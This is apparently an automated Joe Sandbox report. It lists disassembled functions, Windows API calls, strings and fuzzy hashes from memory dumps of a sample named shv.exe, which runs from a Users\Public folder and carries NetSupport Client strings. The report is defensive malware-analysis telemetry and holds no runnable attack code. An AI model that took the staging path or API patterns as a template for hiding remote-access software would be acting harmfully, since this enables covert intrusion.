Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: AddressEnumErrorLastModulesProcProcess
String ID: EnumProcessModules
API String ID: 3858832252-3735562946
Opcode ID: 51615341be1cda10aba4413851b3569203e6983c691ec2cfff2fb676c40589df
Instruction ID: 7ca968e72bda715d3327ffa55de58939599f0e7350b98474a2726cf8e24da91d
Opcode Fuzzy Hash: 51615341be1cda10aba4413851b3569203e6983c691ec2cfff2fb676c40589df
Instruction Fuzzy Hash: 22F08272604218AFD710DF99D844F6B77A8EB48721F00C81AF959D7640C774F810CFA0

Function 6D1C5000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6D1C5014
K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6D1C8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6D1C5034
SetLastError.KERNEL32(00000078,00000000,?,6D1C8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6D1C503D

Strings

GetModuleFileNameExA, xrefs: 6D1C500E

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: AddressErrorFileLastModuleNameProc
String ID: GetModuleFileNameExA
API String ID: 4084229558-758377266
Opcode ID: c170ccfd3a14355b7e8d51a6e6811eb1601b71340f0a6af944dd3995cbe53d24
Instruction ID: b46d9d02b66d7e6bb3f76570d93bf19549fa8de3dd655dca13490ae2ccc29a6a
Opcode Fuzzy Hash: c170ccfd3a14355b7e8d51a6e6811eb1601b71340f0a6af944dd3995cbe53d24
Instruction Fuzzy Hash: D5F05E72600218ABD720CF94E904F6777B8EB48B10F00851AF945D7240D671E810CBF1

Function 111377F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27threadCOMMON

Download Yara Rule

APIs

Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D

CreateThread.KERNEL32(00000000,00001000,Function_00137630,00000000,00000000,11138782), ref: 1113782E
CloseHandle.KERNEL32(00000000,?,11138782,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11137835

Strings

Client, xrefs: 1113780C
*AutoICFConfig, xrefs: 11137807

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: CloseCreateHandleThread__wcstoi64
String ID: *AutoICFConfig$Client
API String ID: 3257255551-59951473
Opcode ID: dfa9394c4f67a9a88e2af19c5cad945f9de50f524f94f1ff9e5559edc0139d1c
Instruction ID: 9aee7181833ba8711af7cecc10eced9f2f0784297ad8accf53734ae3fbf9e9e1
Opcode Fuzzy Hash: dfa9394c4f67a9a88e2af19c5cad945f9de50f524f94f1ff9e5559edc0139d1c
Instruction Fuzzy Hash: 98E0D8757A062D7AF6149AE98C86F65F6199744B26F500154FA20A50C4D6A0A440CB64

Function 6D1CA4E0 Relevance: 6.1, APIs: 4, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6D20B898,00000000,?,?,?,6D1CDA7F,?,00000000), ref: 6D1CA503
InterlockedExchange.KERNEL32(?,00000000), ref: 6D1CA568
Sleep.KERNEL32(00000000,?,6D1CDA7F,?,00000000), ref: 6D1CA581
LeaveCriticalSection.KERNEL32(6D20B898,00000000), ref: 6D1CA5B3

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
String ID:
API String ID: 4212191310-0
Opcode ID: b0042c772b0833819a784ecd51290f995f95ba974e6003e718d28cb1bc8fc5d2
Instruction ID: 8a5c4f7d978a048b15be88b6d50d9131f9c514abc1cb0cd85a8a629c4daff5be
Opcode Fuzzy Hash: b0042c772b0833819a784ecd51290f995f95ba974e6003e718d28cb1bc8fc5d2
Instruction Fuzzy Hash: DF210EB29042059FEB228F19C849F7BB7B9EFB6318F05441BD85693155D3B9A840CB53

Function 00AB1020 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 00AB1027
GetStartupInfoA.KERNEL32(?), ref: 00AB107B
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 00AB1096
ExitProcess.KERNEL32 ref: 00AB10A3

Memory Dump Source

Source File: 00000006.00000002.3993626943.0000000000AB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000006.00000002.3993579084.0000000000AB0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3993652493.0000000000AB2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ab0000_shv.jbxd

Yara matches

Similarity

API ID: CommandExitHandleInfoLineModuleProcessStartup
String ID:
API String ID: 2164999147-0
Opcode ID: 75adcc70a24706b67fdf6e631d918a31ad5fb593c4f12e2849031f796d0443e4
Instruction ID: c34979d4693a0fb8aaaf05df5ce84b7a34dde8de059a3d63601e06e6a1d43c1d
Opcode Fuzzy Hash: 75adcc70a24706b67fdf6e631d918a31ad5fb593c4f12e2849031f796d0443e4
Instruction Fuzzy Hash: DA11C4304083C85AEB31BFA489A87EABFBDAF12385FA40045ECD696147D2564CC7C7A5

Function 11143C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\shv.exe,00000104,?,11143E73,?), ref: 11143C49

Strings

C:\Users\Public\Netstat\shv.exe, xrefs: 11143C34, 11143C42

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: CurrentFileModuleNameProcess
String ID: C:\Users\Public\Netstat\shv.exe
API String ID: 2251294070-727063226
Opcode ID: a55002870a0d4bf1cb71c4a6dc96a3b81f728eb301552921936b9ec7c45aaea3
Instruction ID: b9aa28b4973dc8f7500fb142756b1fa860f28402029a3e5f5efe4e67c4e883a6
Opcode Fuzzy Hash: a55002870a0d4bf1cb71c4a6dc96a3b81f728eb301552921936b9ec7c45aaea3
Instruction Fuzzy Hash: F811E7747282235BE7149F76C994719F7A5AB40B5DF20403EE819C76C4DB71F845C744

Function 110D0710 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

__strdup.LIBCMT ref: 110D072A

Strings

..\CTL32\NSMString.cpp, xrefs: 110D076A
*this==pszSrc, xrefs: 110D076F

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: __strdup
String ID: *this==pszSrc$..\CTL32\NSMString.cpp
API String ID: 838363481-1175285396
Opcode ID: a5ac4ff3829c8bdfed65d0be2f6ac40a61aed290b17ea4ddc345f192aeee3708
Instruction ID: a2c6fbdb01941a66b86811b43504396004731e14ba87e068c6e3ef76d86aa108
Opcode Fuzzy Hash: a5ac4ff3829c8bdfed65d0be2f6ac40a61aed290b17ea4ddc345f192aeee3708
Instruction Fuzzy Hash: 74F0287AE403466BC701DE2EBC04A57FBD89F856D8B05807AE89CD7205E570F4048AD1

Function 1110F4A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1110F4A9

Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96

_memset.LIBCMT ref: 1110F4D2

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

Strings

..\ctl32\Refcount.cpp, xrefs: 1110F4BC

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
String ID: ..\ctl32\Refcount.cpp
API String ID: 2803934178-2363596943
Opcode ID: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
Instruction ID: 747f5be640ff5df7f7be77ac0748be8e5b1ae2afb2ba592a3adef8646797d69b
Opcode Fuzzy Hash: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
Instruction Fuzzy Hash: B5E0C23AE4013933C112258A2C03FDBF69C8BD19FCF060021FE0CAA201E586B55181E6

Function 1115BDE0 Relevance: 4.7, APIs: 3, Instructions: 158COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 1115BE03

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: _calloc
String ID:
API String ID: 1679841372-0
Opcode ID: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
Instruction ID: 0024421513bb2e1abb717dbf2ce3cdefbb73aa1ee3cdb3a5feae03928f974db8
Opcode Fuzzy Hash: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
Instruction Fuzzy Hash: 8C519E7560020AAFDB50CF68CC81FAAB7A6FF8A704F148459F929DB280D771E901CF95

Function 6D1C8FB0 Relevance: 4.6, APIs: 3, Instructions: 57networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6D1C8FE4
getsockname.WSOCK32(?,?,00000010,?,01712FA8,?), ref: 6D1C9005
WSAGetLastError.WSOCK32(?,?,00000010,?,01712FA8,?), ref: 6D1C902E

Part of subcall function 6D1C5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6D1C8F91,00000000,00000000,6D20B8DA,?,00000080), ref: 6D1C5852

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: ErrorLast_memsetgetsocknameinet_ntoa
String ID:
API String ID: 3066294524-0
Opcode ID: 422a2c29836feb6377b0ca4b1d48344e435764310a78c2b86510d9e3a053ed15
Instruction ID: 3b08aa42fb6e899e27d43a262040e443f274457cef29e70428b181c483e2de66
Opcode Fuzzy Hash: 422a2c29836feb6377b0ca4b1d48344e435764310a78c2b86510d9e3a053ed15
Instruction Fuzzy Hash: 7F111872A04109ABCB10DFA9DC01ABFB7B8EF49614F45456EED09E7244EBB06A148B91

Function 11111430 Relevance: 4.5, APIs: 3, Instructions: 49COMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
__wsplitpath.LIBCMT ref: 11111475

Part of subcall function 11169044: __splitpath_helper.LIBCMT ref: 11169086

GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
String ID:
API String ID: 1847508633-0
Opcode ID: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
Instruction ID: 71a9510f599fa1c136cb45ff21797ad5c5790827a759e4d2b52c0b71367846c8
Opcode Fuzzy Hash: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
Instruction Fuzzy Hash: 34116175A4021DABEB14DF94CD42FE9F378AB48B04F404199E7246B1C0E7B12A48CB65

Function 1110F720 Relevance: 3.8, APIs: 3, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(111F0908,461C6054,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F754
EnterCriticalSection.KERNEL32(111F0908,461C6054,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F770
LeaveCriticalSection.KERNEL32(111F0908,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F7B8

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterInitializeLeave
String ID:
API String ID: 3991485460-0
Opcode ID: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
Instruction ID: 724175da6b3b5eb63f60f43096b8b9410b0df93e13cce3f4766159a849acac97
Opcode Fuzzy Hash: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
Instruction Fuzzy Hash: 3D11C675A0061AAFE700CF65CD85B5BF7A9FB88714F010129E829E3340F7359808CB92

Function 6D1C5840 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

inet_ntoa.WSOCK32(00000080,?,00000000,?,6D1C8F91,00000000,00000000,6D20B8DA,?,00000080), ref: 6D1C5852

Strings

gfff, xrefs: 6D1C5890

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: inet_ntoa
String ID: gfff
API String ID: 1879540557-1553575800
Opcode ID: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
Instruction ID: 7a69c833444ff0d0c7b0244e1ecc5904b7ff167726e1d023e86c25394f119e99
Opcode Fuzzy Hash: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
Instruction Fuzzy Hash: 8811C2217082D78BD3228A2E98602F7BFD5DFB7240B1C4469D9C9CB305C655D409C7D2

Function 110ED1A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON

Download Yara Rule

APIs

Part of subcall function 110ED160: RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D

RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED1BC

Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B

Strings

Error %d Opening regkey %s, xrefs: 110ED1CA

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: CloseOpenwvsprintf
String ID: Error %d Opening regkey %s
API String ID: 1772833024-3994271378
